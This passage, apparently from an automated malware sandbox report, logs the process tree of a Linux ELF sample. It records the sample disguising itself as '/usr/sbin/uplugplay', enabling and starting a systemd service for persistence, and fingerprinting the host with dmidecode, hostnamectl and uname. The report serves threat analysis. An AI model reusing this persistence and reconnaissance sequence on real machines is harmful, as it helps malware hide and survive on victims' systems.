MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6237, Parent PID: 6236

General

Start time (UTC):	23:47:53
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 6237, Parent PID: 6236

General

Start time (UTC):	23:47:53
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep na.elf
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6240, Parent PID: 6233

General

Start time (UTC):	23:47:54
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6240, Parent PID: 6233

General

Start time (UTC):	23:47:54
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pidof na.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6241, Parent PID: 6240

General

Start time (UTC):	23:47:54
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pidof PID: 6241, Parent PID: 6240

General

Start time (UTC):	23:47:54
Start date (UTC):	31/03/2025
Path:	/usr/bin/pidof
Arguments:	pidof na.elf
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6244, Parent PID: 6233

General

Start time (UTC):	23:47:56
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6244, Parent PID: 6233

General

Start time (UTC):	23:47:56
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep uplugplay"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6245, Parent PID: 6244

General

Start time (UTC):	23:47:56
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 6245, Parent PID: 6244

General

Start time (UTC):	23:47:56
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep uplugplay
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6250, Parent PID: 6233

General

Start time (UTC):	23:47:57
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6250, Parent PID: 6233

General

Start time (UTC):	23:47:57
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep upnpsetup"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6251, Parent PID: 6250

General

Start time (UTC):	23:47:57
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 6251, Parent PID: 6250

General

Start time (UTC):	23:47:57
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep upnpsetup
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6254, Parent PID: 6233

General

Start time (UTC):	23:47:58
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6254, Parent PID: 6233

General

Start time (UTC):	23:47:58
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pidof upnpsetup"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6255, Parent PID: 6254

General

Start time (UTC):	23:47:58
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pidof PID: 6255, Parent PID: 6254

General

Start time (UTC):	23:47:58
Start date (UTC):	31/03/2025
Path:	/usr/bin/pidof
Arguments:	pidof upnpsetup
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 6256, Parent PID: 6233

General

Start time (UTC):	23:47:59
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6256, Parent PID: 6233

General

Start time (UTC):	23:47:59
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl daemon-reload"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6257, Parent PID: 6256

General

Start time (UTC):	23:47:59
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 6257, Parent PID: 6256

General

Start time (UTC):	23:47:59
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: na.elf PID: 6271, Parent PID: 6233

General

Start time (UTC):	23:48:00
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6271, Parent PID: 6233

General

Start time (UTC):	23:48:00
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl enable uplugplay.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6272, Parent PID: 6271

General

Start time (UTC):	23:48:00
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 6272, Parent PID: 6271

General

Start time (UTC):	23:48:00
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl enable uplugplay.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: na.elf PID: 6278, Parent PID: 6233

General

Start time (UTC):	23:48:01
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6278, Parent PID: 6233

General

Start time (UTC):	23:48:01
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl start uplugplay.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6279, Parent PID: 6278

General

Start time (UTC):	23:48:01
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 6279, Parent PID: 6278

General

Start time (UTC):	23:48:01
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl start uplugplay.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: systemd PID: 6259, Parent PID: 6258

General

Start time (UTC):	23:48:00
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: snapd-env-generator PID: 6259, Parent PID: 6258

General

Start time (UTC):	23:48:00
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

File Activities

File Opened

File Read

File Written

Chronological Activities

Analysis Process: systemd PID: 6276, Parent PID: 6275

General

Start time (UTC):	23:48:01
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: snapd-env-generator PID: 6276, Parent PID: 6275

General

Start time (UTC):	23:48:01
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

File Activities

File Opened

File Read

File Written

Chronological Activities

Analysis Process: systemd PID: 6280, Parent PID: 1

General

Start time (UTC):	23:48:02
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uplugplay PID: 6280, Parent PID: 1

General

Start time (UTC):	23:48:02
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	/usr/sbin/uplugplay
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

File Activities

File Opened

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: uplugplay PID: 6282, Parent PID: 6280

General

Start time (UTC):	23:48:02
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

File Activities

File Opened

Process Activities

Process Forked

Chronological Activities

Analysis Process: uplugplay PID: 6283, Parent PID: 6282

General

Start time (UTC):	23:48:02
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6283, Parent PID: 6282

General

Start time (UTC):	23:48:02
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "/usr/sbin/uplugplay -Dcomsvc"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6284, Parent PID: 6283

General

Start time (UTC):	23:48:02
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uplugplay PID: 6284, Parent PID: 6283

General

Start time (UTC):	23:48:02
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	/usr/sbin/uplugplay -Dcomsvc
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

File Activities

File Opened

File Read

File Written

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Network Activities

Socket Listening

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 6288, Parent PID: 6284

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6288, Parent PID: 6284

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c hostnamectl
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6289, Parent PID: 6288

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: hostnamectl PID: 6289, Parent PID: 6288

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/usr/bin/hostnamectl
Arguments:	hostnamectl
File size:	26848 bytes
MD5 hash:	b1245aa6d3c28b5d5fedb2d681d32eb9

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 6294, Parent PID: 6284

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6294, Parent PID: 6284

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c hostnamectl
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6295, Parent PID: 6294

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: hostnamectl PID: 6295, Parent PID: 6294

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/usr/bin/hostnamectl
Arguments:	hostnamectl
File size:	26848 bytes
MD5 hash:	b1245aa6d3c28b5d5fedb2d681d32eb9

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 6437, Parent PID: 6284

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6437, Parent PID: 6284

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "dmidecode --type baseboard"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6441, Parent PID: 6437

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: dmidecode PID: 6441, Parent PID: 6437

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/usr/sbin/dmidecode
Arguments:	dmidecode --type baseboard
File size:	121856 bytes
MD5 hash:	37284ba29446fb2dadf1ce80f8139c1a

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 6440, Parent PID: 6284

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6440, Parent PID: 6284

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c uptime
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6444, Parent PID: 6440

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uptime PID: 6444, Parent PID: 6440

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/usr/bin/uptime
Arguments:	uptime
File size:	14568 bytes
MD5 hash:	3ad70d8e33316ac713bf25c2ddf2fb14

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 6447, Parent PID: 6284

General

Start time (UTC):	23:48:06
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6447, Parent PID: 6284

General

Start time (UTC):	23:48:06
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "uname -a"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6448, Parent PID: 6447

General

Start time (UTC):	23:48:06
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uname PID: 6448, Parent PID: 6447

General

Start time (UTC):	23:48:06
Start date (UTC):	31/03/2025
Path:	/usr/bin/uname
Arguments:	uname -a
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

File Activities

File Opened

File Read

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: uplugplay PID: 6453, Parent PID: 6284

General

Start time (UTC):	23:48:06
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6453, Parent PID: 6284

General

Start time (UTC):	23:48:06
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "dmidecode --type baseboard"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6454, Parent PID: 6453

General

Start time (UTC):	23:48:06
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: dmidecode PID: 6454, Parent PID: 6453

General

Start time (UTC):	23:48:06
Start date (UTC):	31/03/2025
Path:	/usr/sbin/dmidecode
Arguments:	dmidecode --type baseboard
File size:	121856 bytes
MD5 hash:	37284ba29446fb2dadf1ce80f8139c1a

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 6457, Parent PID: 6284

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6457, Parent PID: 6284

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "dmidecode --type baseboard"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6458, Parent PID: 6457

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: dmidecode PID: 6458, Parent PID: 6457

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/usr/sbin/dmidecode
Arguments:	dmidecode --type baseboard
File size:	121856 bytes
MD5 hash:	37284ba29446fb2dadf1ce80f8139c1a

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 6461, Parent PID: 6284

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6461, Parent PID: 6284

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c dmidecode
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6462, Parent PID: 6461

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: dmidecode PID: 6462, Parent PID: 6461

General

Start time (UTC):	23:48:07
Start date (UTC):	31/03/2025
Path:	/usr/sbin/dmidecode
Arguments:	dmidecode
File size:	121856 bytes
MD5 hash:	37284ba29446fb2dadf1ce80f8139c1a

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 6471, Parent PID: 6284

General

Start time (UTC):	23:48:09
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6471, Parent PID: 6284

General

Start time (UTC):	23:48:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c uptime
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6472, Parent PID: 6471

General

Start time (UTC):	23:48:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uptime PID: 6472, Parent PID: 6471

General

Start time (UTC):	23:48:09
Start date (UTC):	31/03/2025
Path:	/usr/bin/uptime
Arguments:	uptime
File size:	14568 bytes
MD5 hash:	3ad70d8e33316ac713bf25c2ddf2fb14

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 6475, Parent PID: 6284

General

Start time (UTC):	23:48:09
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	a602ed9fc13cf561bf74b56f8c1aa2ed

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 6475, Parent PID: 6284

General

Start time (UTC):	23:48:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "uname -a"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 6476, Parent PID: 6475

General

Start time (UTC):	23:48:09
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uname PID: 6476, Parent PID: 6475

General

Start time (UTC):	23:48:09
Start date (UTC):	31/03/2025
Path:	/usr/bin/uname
Arguments:	uname -a
File size:	39288 bytes
MD5 hash:	4ac7c634c5bec95753c480e9d421dcc2

File Activities

File Opened

File Read

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: fwupd PID: 6291, Parent PID: 1

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6291, Parent PID: 1

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	/usr/bin/gpg --version
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6297, Parent PID: 1

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6297, Parent PID: 1

General

Start time (UTC):	23:48:03
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: systemd PID: 6298, Parent PID: 1

General

Start time (UTC):	23:48:04
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemd-hostnamed PID: 6298, Parent PID: 1

General

Start time (UTC):	23:48:04
Start date (UTC):	31/03/2025
Path:	/lib/systemd/systemd-hostnamed
Arguments:	/lib/systemd/systemd-hostnamed
File size:	35040 bytes
MD5 hash:	2cc8a5576629a2d5bd98e49a4b8bef65

File Activities

File Opened

File Read

Process Activities

Prctl Requested

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6434, Parent PID: 1

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6434, Parent PID: 1

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 6443, Parent PID: 1

General

Start time (UTC):	23:48:05
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 6443, Parent PID: 1

General

Start time (UTC):	23:48:05
